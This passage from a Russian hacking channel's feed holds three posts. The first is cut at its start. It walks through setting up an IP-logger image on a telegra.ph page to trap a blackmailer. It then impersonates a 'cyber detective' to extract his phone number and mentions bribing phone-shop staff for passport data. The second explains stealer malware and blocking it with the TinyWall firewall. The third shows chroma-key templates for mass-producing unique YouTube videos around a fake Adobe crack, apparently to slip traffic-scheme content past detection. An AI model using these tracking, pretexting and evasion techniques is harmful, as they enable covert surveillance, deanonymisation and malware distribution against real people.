  &lt;p id=&quot;ILOV&quot; data-align=&quot;center&quot;&gt;Давайте перейдём к делу! Приманкой я выбрал &amp;quot;деанон&amp;quot; на шантажиста, чтобы он 100% открыл нашу заготовку. Делаем аккаунт на &lt;a href=&quot;https://iplogger.org/signup/&quot; target=&quot;_blank&quot;&gt;этом сайте&lt;/a&gt; и ищем любую картинку. Копируем её адрес и создаем &amp;quot;IP Tracker&amp;quot; используя сайт. Домен выбираем любой, это не повлияет. Самое главное: расширение ссылки &lt;code&gt;.png&lt;/code&gt;!&lt;br /&gt;Правильную настройку можно увидеть на скриншоте ниже: &lt;/p&gt;
  &lt;figure id=&quot;isZG&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/09/30/09303c2f-4010-4975-8e62-d45042c1b51b.png&quot; width=&quot;683.0000000000001&quot; /&gt;
    &lt;figcaption&gt;&lt;em&gt;&lt;strong&gt;создание картинки-логгера&lt;/strong&gt;&lt;/em&gt;&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;j46q&quot; data-align=&quot;center&quot;&gt;Можно включить некоторые пункты для определения GPS, но в моем случае нужно действовать осторожно, поэтому, чтобы не вспугнуть его, я не рисковал.&lt;br /&gt;Далее заходим на telegra.ph и создаем новый пост. Внутри можем писать что угодно, наша цель: указать ссылку на логгер. У меня получилось вот так:&lt;/p&gt;
  &lt;figure id=&quot;PleL&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/ca/d9/cad91c25-7871-4268-8f17-e0c74db4bc5a.png&quot; width=&quot;551&quot; /&gt;
    &lt;figcaption&gt;&lt;strong&gt;&lt;em&gt;P.S.: Если у вас не появляется картинка после ввода ссылки, нажмите &amp;quot;Enter&amp;quot;.&lt;/em&gt;&lt;/strong&gt;&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;sCBp&quot; data-align=&quot;center&quot;&gt;Как мы видим, вместо страшной ссылки у нас появилась картинка. Но не простая! Теперь каждый кто посетит нашу запись на telegra.ph будет отслеживаться. Таким образом мы попытаемся заставить перейти вредителя на чистый сайт в котором будет грязная нагрузка. И у нас получилось! Он даже ничего не заподозрил.&lt;/p&gt;
  &lt;figure id=&quot;7Fft&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/d6/5f/d65f6ad7-baaa-43ad-aede-bbace9bb9bbd.png&quot; width=&quot;674&quot; /&gt;
    &lt;figcaption&gt;&lt;strong&gt;&lt;em&gt;удачная попытка узнать IP&lt;/em&gt;&lt;/strong&gt;&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Nj3V&quot; data-align=&quot;center&quot;&gt;Тем временем, мы получаем 2 новые строчки на сайте, которые гласят, что некий абонент предположительно с Краснодара открыл нашу картинку. Проверка айпи на Прокси/VPN/Дедик показала, что он чистый. Провайдер, как я понял, хостит только Краснодар, поэтому, в городе можно быть уверенным на 100%.&lt;/p&gt;
  &lt;figure id=&quot;313V&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/94/b4/94b47755-7060-40b7-9d8c-e8d10db937e4.png&quot; width=&quot;733&quot; /&gt;
    &lt;figcaption&gt;&lt;strong&gt;&lt;em&gt;информация с полученного перехода&lt;/em&gt;&lt;/strong&gt;&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;exB6&quot; data-align=&quot;center&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;EL7q&quot; data-align=&quot;center&quot;&gt;СИ.: Получаем полный номер&lt;/h2&gt;
  &lt;p id=&quot;Semv&quot; data-align=&quot;center&quot;&gt;Информации которую мы получили с головой достаточно, чтобы засадить вымогателя в места не столь отдалённые. Но, наша цель состоит в полной деанонимизации особи, что поспособствует уходу с рынка + принудительном полном возврате всего украденного. Для этого нам следует узнать только полный номер телефона. Далее в ход смогут пойти продажные сотрудники сотовых салонов, которые за несколько сотен раздобудут даже паспортные данные. Чтобы узнать полный номер, мы воспользуемся безвыходной ситуацией для нашего вредителя, которую сейчас и создадим. Имитируя &amp;quot;кибер детектива&amp;quot; мы составили такое письмо и отправили его. По понятным причинам, проигнорировать такое будет самым глупым решением, когда тебе грозит срок.&lt;/p&gt;
  &lt;figure id=&quot;yJYG&quot; class=&quot;m_original&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/17/97/17970849-a5da-4703-ae2a-24d34f601d23.png&quot; width=&quot;663&quot; /&gt;
    &lt;figcaption&gt;&lt;strong&gt;&lt;em&gt;СИ.: Уговорили написать в WhatsApp и узнали полный номер&lt;/em&gt;&lt;/strong&gt;&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;XwRR&quot; data-align=&quot;center&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;YNdx&quot; data-align=&quot;center&quot;&gt;Итоги&lt;/h2&gt;
  &lt;p id=&quot;AKnt&quot; data-align=&quot;center&quot;&gt;Я получил от него сообщение, узнав его полный номер. Остальную часть выкладывать не стану. Немного о нём: его родители умерли несколько лет назад в автокатастрофе, живёт он с бабушкой, учится в 10 классе. Меня очень просили не публиковать данные и даже предлагали деньги, на что я отказался. (от денег) Чтобы не портить жизнь, мы провели длинную беседу и он вернул всем средства, даже на наш канал подписался:) На данный момент все его аккаунты удалены, он пообещал мне не заниматься подобными делами. Подумайте несколько раз перед тем, как влезать в нелегал. Если вам будут писать подобные личности, пересылайте их сообщения &lt;a href=&quot;http://T.ME/QUARNET&quot; target=&quot;_blank&quot;&gt;мне на аккаунт&lt;/a&gt;. Таких методов деанонимизации уйма, мы использовали только один из них. Если тема вам интересна и вы хотите подобных статей дальше - пишите мне в личные сообщения. &lt;br /&gt;И самое главное! Тем, кто не увидел дис&lt;code&gt;клей&lt;/code&gt;мер: личность вымышлена, совпадения случайны, статья написана искусственным интеллектом.&lt;br /&gt;Всем добра и мирного неба!&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;RrPF&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;НАШ КАНАЛ: &lt;a href=&quot;https://t.me/hack2day&quot; target=&quot;_blank&quot;&gt;t.me/hack2day&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;dea4&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;НАШ КАНАЛ: &lt;a href=&quot;https://t.me/hack2day&quot; target=&quot;_blank&quot;&gt;t.me/hack2day&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;EHHk&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;НАШ КАНАЛ: &lt;a href=&quot;https://t.me/hack2day&quot; target=&quot;_blank&quot;&gt;t.me/hack2day&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

</content></entry><entry><id>hack2day:sjp7conAPaB</id><link rel="alternate" type="text/html" href="https://teletype.in/@hack2day/sjp7conAPaB?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=hack2day"></link><title>Прощайте, стилеры / майнеры!</title><published>2023-03-19T20:46:06.419Z</published><updated>2023-03-19T20:46:06.419Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img1.teletype.in/files/04/7a/047a2590-6c4a-414a-b493-b7de0375eb0e.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fphonoteka.org%2Fuploads%2Fposts%2F2021-05%2F1620286626_7-phonoteka_org-p-bez-zadnego-fona-7.png&amp;f=1&amp;nofb=1&amp;ipt=d0f7e5a24b362defd4f8fd8b20f2b3300799286fb8597373cb44abf350df0dea&amp;ipo=images&quot;&gt;Приветствую. Я практически полностью уверен в том, что после скачки какого-либо файла вы бежите проверять его используя VirusTotal / Windows Defender и/или прочие антивирусы. Спешу вас огорчить, новый вирус НИКОГДА не покажет детектов. Антивирусы работают по своим базам, чтобы код был &quot;слит&quot; в базы, вирусу нужно посетить минимум 1.000 компьютеров для адекватного анализа.
Да и о чём тут говорить, сейчас крипт за 10$ обходит крупнейшие антивирусы.
Но что же тогда делать? Рассмотрим универсальное решение, приятного чтения!
Не забываем поддерживать проект донатом на LZT / Подпиской на канал.</summary><content type="html">
  &lt;p id=&quot;mRMk&quot; data-align=&quot;center&quot;&gt;Приветствую. Я практически полностью уверен в том, что после скачки какого-либо файла вы бежите проверять его используя VirusTotal / Windows Defender и/или прочие антивирусы. Спешу вас огорчить, новый вирус НИКОГДА не покажет детектов. Антивирусы работают по своим базам, чтобы код был &amp;quot;слит&amp;quot; в базы, вирусу нужно посетить минимум 1.000 компьютеров для адекватного анализа.&lt;br /&gt;Да и о чём тут говорить, сейчас крипт за 10$ обходит крупнейшие антивирусы.&lt;br /&gt;Но что же тогда делать? Рассмотрим универсальное решение, приятного чтения!&lt;br /&gt;&lt;strong&gt;Не забываем поддерживать проект &lt;a href=&quot;https://zelenka.guru/members/6184003/&quot; target=&quot;_blank&quot;&gt;донатом на LZT&lt;/a&gt; / &lt;a href=&quot;http://t.me/hack2day&quot; target=&quot;_blank&quot;&gt;Подпиской на канал&lt;/a&gt;.&lt;/strong&gt;&lt;/p&gt;
  &lt;figure id=&quot;dHe5&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fphonoteka.org%2Fuploads%2Fposts%2F2021-05%2F1620286626_7-phonoteka_org-p-bez-zadnego-fona-7.png&amp;f=1&amp;nofb=1&amp;ipt=d0f7e5a24b362defd4f8fd8b20f2b3300799286fb8597373cb44abf350df0dea&amp;ipo=images&quot; width=&quot;383.0943396226415&quot; /&gt;
  &lt;/figure&gt;
  &lt;h3 id=&quot;xlMp&quot; data-align=&quot;center&quot;&gt;Анализируем работу вирусов&lt;/h3&gt;
  &lt;p id=&quot;sykm&quot; data-align=&quot;center&quot;&gt;Чтобы противостоять потенциальной угрозе, нам нужно узнать основной принцип работы. Под мою руку попал &lt;code&gt;RedLine Stealer&lt;/code&gt; (лидер рынка), который был скачан &amp;quot;пальцем в небо&amp;quot; на площадке YouTube. Что объединяет большинство вирусов? Они бесполезны без доступа к сети. Сделав дамп памяти я увидел, что Stealer&amp;#x60;ы используют заготовленные пути, по которым они воруют данные и отправляют их протоколом TCP, используя случайный порт. В теории, мы могли бы использовать портативные версии приложений для того, чтобы &amp;quot;обмануть&amp;quot; вредонос, но это костыли. Есть идеальный, универсальный вариант — ограничить неизвестному приложению доступ к сети. Даже если ему удастся украсть данные, он не сможет их никуда отправить. Аналогичная ситуация с майнерами, кейлоггерами и прочими вирусами. Нагрузка будет минимальной, в отличие от антивирусов, которые шерстят всю систему каждых 2 секунды и вредят не хуже майнера. &lt;br /&gt;Для этого мы будем использовать Firewall, который многие считают старьем,&lt;br /&gt;но при правильной настройке эта штука утирает нос любому антивирусу!&lt;/p&gt;
  &lt;figure id=&quot;xHrg&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/b5/5c/b55ca4d8-6516-42ab-a2af-814c1466f5f7.png&quot; width=&quot;648.7142857142858&quot; /&gt;
  &lt;/figure&gt;
  &lt;h3 id=&quot;2dur&quot; data-align=&quot;center&quot;&gt;Как работает Firewall&lt;/h3&gt;
  &lt;p id=&quot;7mb9&quot; data-align=&quot;center&quot;&gt;Предположим, мы скачали вирус, который отправляет ваши данные на какой-то сервер / майнит с вашего устройства. Фаервол создает &amp;quot;каменную стену&amp;quot;, блокируя трафик для неизвестных приложений. Фактически, вирус сможет задействовать себя, собрать нужные файлы и совершить post запрос, но бесполезно. Запрос не сможет &amp;quot;пробить&amp;quot; нашу стену и останется в нашей оперативной памяти до тех пор, пока мы не перезагрузим устройство. Таким образом большинство вирусов стают бесполезными и безвредными:)&lt;/p&gt;
  &lt;figure id=&quot;BcYP&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/15/5d/155d9608-e44a-429e-8109-391caf246633.png&quot; width=&quot;618&quot; /&gt;
  &lt;/figure&gt;
  &lt;h3 id=&quot;GVKy&quot; data-align=&quot;center&quot;&gt;Реализация&lt;/h3&gt;
  &lt;p id=&quot;YNIb&quot; data-align=&quot;center&quot;&gt;Попытавшись настроить встроенный Firewall от Windows я не добился адекватного результата. Нужно было создавать правила доступа к сети для каждого приложения, что в принципе очень неудобно и непрактично. Все же, альтернатива нашлась: &lt;a href=&quot;https://tinywall.pados.hu/&quot; target=&quot;_blank&quot;&gt;TinyWall&lt;/a&gt;. При выборе у меня были такие требования: бесперебойная работа, открытые исходники, без бесящих уведомлений. Я проверил около 7 аналогов которые либо платные и кидают кучу уведомлений с просьбой о подписке, либо пропускают трафик и не прошли моё личное тестирование. Скачать TinyWall можно на &lt;a href=&quot;https://tinywall.pados.hu/&quot; target=&quot;_blank&quot;&gt;официальном сайте&lt;/a&gt;, &lt;a href=&quot;https://github.com/pylorak/TinyWall&quot; target=&quot;_blank&quot;&gt;исходники тут&lt;/a&gt;.&lt;/p&gt;
  &lt;figure id=&quot;ceZk&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/25/2d/252df962-296a-498d-b908-14bdd4486d52.png&quot; width=&quot;670.8816568047338&quot; /&gt;
  &lt;/figure&gt;
  &lt;h3 id=&quot;vl57&quot; data-align=&quot;center&quot;&gt;Настройка&lt;/h3&gt;
  &lt;p id=&quot;hhch&quot; data-align=&quot;center&quot;&gt;Изначально софт не настроен и блокирует то, что в теории не нужно. (речь о браузере, мессенджерах и т.д.) Я бы посоветовал использовать &amp;quot;&lt;code&gt;Автоматическое обучение&lt;/code&gt;&amp;quot;. Это работает по такому принципу: вы используете систему несколько часов, как обычно. Firewall запоминает используемые программы и добавляет их в White-List. Обязательно проверьте перед этим систему антивирусом, чтобы не добавить уже присутствующие вирусы в &amp;quot;белый список&amp;quot;! Когда вы попользовались устройством несколько часов, смените режим работы на &amp;quot;Normal&amp;quot;. Если какое-то новое приложение попытается соединиться с сервером, Firewall автоматически ограничит ему доступ к сети и сообщит вам об этом. Если вы считаете что программа безвредна, можно удобно выбрать её процесс и разрешить доступ к сети (пока вы не разрешите, она будет оффлайн). Так же можно разрешить принимать трафик в одностороннем режиме, без отправки. Использую это приложение более года и оно не подвело меня ни разу.&lt;/p&gt;
  &lt;figure id=&quot;BID9&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/96/57/96575ada-461d-4143-979b-3b3ade6ac89a.png&quot; width=&quot;608&quot; /&gt;
  &lt;/figure&gt;
  &lt;h3 id=&quot;MJAa&quot; data-align=&quot;center&quot;&gt;Итоги работы&lt;/h3&gt;
  &lt;p id=&quot;26yo&quot; data-align=&quot;center&quot;&gt;Теперь нам не страшен никакой вирус, который взаимодействует с сетью. Все новые приложения будут &amp;quot;отключены&amp;quot; от сети. Даже самый дорогой крипт не сумеет такое обойти. Статья написана по просьбе нашего подписчика, который был взволнован после того, как мы маскировали Stealer под любой файл. Кстати, вы тоже можете предложить идею для новой статьи &lt;a href=&quot;https://t.me/QuarNET&quot; target=&quot;_blank&quot;&gt;написав мне в Telegram.&lt;/a&gt;&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;RrPF&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;НАШ КАНАЛ: &lt;a href=&quot;https://t.me/hack2day&quot; target=&quot;_blank&quot;&gt;t.me/hack2day&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;dea4&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;НАШ КАНАЛ: &lt;a href=&quot;https://t.me/hack2day&quot; target=&quot;_blank&quot;&gt;t.me/hack2day&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;EHHk&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;НАШ КАНАЛ: &lt;a href=&quot;https://t.me/hack2day&quot; target=&quot;_blank&quot;&gt;t.me/hack2day&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

</content></entry><entry><id>hack2day:DcKd0eQ4zmT</id><link rel="alternate" type="text/html" href="https://teletype.in/@hack2day/DcKd0eQ4zmT?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=hack2day"></link><title>Креативы под пролив за минуту</title><published>2023-03-12T21:21:38.728Z</published><updated>2023-03-12T21:42:48.530Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img3.teletype.in/files/2d/1c/2d1ce538-84f0-4392-b0b6-20ef270b19da.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://img3.teletype.in/files/69/32/6932416d-049a-4929-8dc9-048f682002c0.png&quot;&gt;Приветствую! Перед началом, хочу поведать вам небольшую историю. В 2021 году мы с приятелем занимались переливом трафика на разных платформах, обладая неограниченным количеством аккаунтов была возможность заливать хоть тысячи креативов, но.. Креативы создавались далеко не за минуту, уходили часы времени, искусственные интеллекты не продвигали материал, который был ранее загружен на площадку. Использование специализированных программ для уникализации существенно портили картинку либо же не давали ожидаемого результата, пришлось изобретать альтернативу. Нам нужен был шаблон, который мы могли превратить в уникальный материал буквально в два клика, и у нас получилось. Приятного ознакомления, написано для канала HACK2DAY!</summary><content type="html">
  &lt;p id=&quot;cCs4&quot; data-align=&quot;center&quot;&gt;Приветствую! Перед началом, хочу поведать вам небольшую историю. В 2021 году мы с приятелем занимались переливом трафика на разных платформах, обладая неограниченным количеством аккаунтов была возможность заливать хоть тысячи креативов, но.. Креативы создавались далеко не за минуту, уходили часы времени, искусственные интеллекты не продвигали материал, который был ранее загружен на площадку. Использование специализированных программ для уникализации существенно портили картинку либо же не давали ожидаемого результата, пришлось изобретать альтернативу. Нам нужен был шаблон, который мы могли превратить в уникальный материал буквально в два клика, и у нас получилось. Приятного ознакомления, написано для канала &lt;a href=&quot;https://t.me/hack2day&quot; target=&quot;_blank&quot;&gt;HACK2DAY&lt;/a&gt;!&lt;/p&gt;
  &lt;p id=&quot;95kN&quot; data-align=&quot;center&quot;&gt;&lt;/p&gt;
  &lt;h3 id=&quot;4E21&quot; data-align=&quot;center&quot;&gt;Выбираем примерочный материал&lt;/h3&gt;
  &lt;p id=&quot;s9qy&quot; data-align=&quot;center&quot;&gt;Искать особо не пришлось, возьмём одну из самых популярных тематик на форуме &lt;a href=&quot;http://zelenka.guru&quot; target=&quot;_blank&quot;&gt;zelenka.guru&lt;/a&gt; — YouTube трафик. Суть: под каждый пролив нужно создавать уникальное видео, чтобы его продвинули алгоритмы, база. Естественно, под условный Google-Ads будет аналогично. Посмотрев примеры я заснял кусочек видео, который должен быть уникален для алгоритмов. В материале курируют главные детали, которые бросаются интеллекту: аудиодорожка, рабочий стол (который занимает около 90% всего видео). Если видео будет уникальным хоть на 60%, система нас продвигает. Теперь стоит вопрос: как нам менять рабочий стол на готовом видео в несколько кликов?&lt;/p&gt;
  &lt;p id=&quot;GTBe&quot; data-align=&quot;center&quot;&gt;&lt;/p&gt;
  &lt;h3 id=&quot;PpUU&quot; data-align=&quot;center&quot;&gt;Подробнее о реализации&lt;/h3&gt;
  &lt;p id=&quot;7ZPc&quot; data-align=&quot;center&quot;&gt;Мы будем использовать хромакей. Нужно записать фрагмент на зелёном фоне рабочего стола / создать маску под заготовленное видео. Используя хромакей мы сможем заменять статичный рабочий стол на любое видео, картинку и т.д, что и сыграет роль уникализации. Для проверки работоспособности, я обратился к своему подписчику трафферу, который немного лучше меня разбирается в этой сфере. Мы накрутили два видеоролика созданные под один шаблон, каналы 300-400 подписчиков. Результат можно наблюдать на картинке ниже. &lt;/p&gt;
  &lt;figure id=&quot;xP4L&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/69/32/6932416d-049a-4929-8dc9-048f682002c0.png&quot; width=&quot;528&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;MrYZ&quot;&gt;&lt;/p&gt;
  &lt;h3 id=&quot;Ynb2&quot; data-align=&quot;center&quot;&gt;Создаем шаблонное видео&lt;/h3&gt;
  &lt;p id=&quot;m2Jg&quot; data-align=&quot;center&quot;&gt;В моем случае идёт запись рабочего стола. Устанавливаем зелёный цвет на обои и делаем нужные действия. Я же буду производить запуск псевдо кряка Adobe.&lt;/p&gt;
  &lt;figure id=&quot;5oKe&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;iframe src=&quot;https://player.vimeo.com/video/807305071/?autoplay=false&amp;loop=false&amp;muted=false&amp;title=true&quot;&gt;&lt;/iframe&gt;
    &lt;figcaption&gt;Примерочное видео на зелёном фоне &lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;lOiY&quot; data-align=&quot;center&quot;&gt;&lt;/p&gt;
  &lt;h3 id=&quot;p59u&quot; data-align=&quot;center&quot;&gt;Переходим к монтажу&lt;/h3&gt;
  &lt;p id=&quot;gFBk&quot; data-align=&quot;center&quot;&gt;Выбираем любой видео редактор, нам потребуется только функция &amp;quot;Chroma Key&amp;quot;.  В моем случае используется Movavi Video Editor. Перекидываем заготовку на дорожку и выделяя видео переходим в настройки ХромаКея.&lt;/p&gt;
  &lt;figure id=&quot;j3z0&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/4f/71/4f718916-1f4c-4d3d-a329-9530c7ea1629.png&quot; width=&quot;706&quot; /&gt;
    &lt;figcaption&gt;Настройка ChromaKey&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;DItv&quot; data-align=&quot;center&quot;&gt;Выделите зелёный пиксель и фон преобразуется в пустоту. Перейдя на сайт &lt;a href=&quot;https://winzoro.net/wallpapers_all/&quot; target=&quot;_blank&quot;&gt;winzoro.net/wallpapers_all&lt;/a&gt; выбираем видео, которое заменит наш рабочий стол. Загрузите и перетащите его на слой ниже, как показано на скриншоте.&lt;br /&gt;Если видео слишком короткое (как у меня) — дублируем его / замедляем.&lt;/p&gt;
  &lt;figure id=&quot;37BW&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/3a/ec/3aec84e5-d28d-41e2-a64b-064b3d2d15be.png&quot; width=&quot;707&quot; /&gt;
    &lt;figcaption&gt;Пример того, как правильно перенести видео&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;wp8k&quot; data-align=&quot;center&quot;&gt;Звук должен быть уникальным на каждом шаблоне, не забывайте менять его.&lt;/p&gt;
  &lt;p id=&quot;Vvz3&quot;&gt;&lt;/p&gt;
  &lt;h3 id=&quot;YRIA&quot; data-align=&quot;center&quot;&gt;Итоги работы&lt;/h3&gt;
  &lt;p id=&quot;RRrR&quot; data-align=&quot;center&quot;&gt;Мы создали многоразовый шаблон, который можем изменять в два клика и получать уникальный материал для заливов на платформе YouTube. Ниже можно глянуть уже готовое видео. Всем удачи и мирного неба над головой!&lt;/p&gt;
  &lt;figure id=&quot;VQUH&quot; class=&quot;m_column&quot;&gt;
    &lt;iframe src=&quot;https://player.vimeo.com/video/807314306/?autoplay=false&amp;loop=false&amp;muted=false&amp;title=true&quot;&gt;&lt;/iframe&gt;
  &lt;/figure&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;RrPF&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;НАШ КАНАЛ: &lt;a href=&quot;https://t.me/hack2day&quot; target=&quot;_blank&quot;&gt;t.me/hack2day&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;dea4&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;НАШ КАНАЛ: &lt;a href=&quot;https://t.me/hack2day&quot; target=&quot;_blank&quot;&gt;t.me/hack2day&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;EHHk&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;НАШ КАНАЛ: &lt;a href=&quot;https://t.me/hack2day&quot; target=&quot;_blank&quot;&gt;t.me/hack2day&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

</content></entry></feed>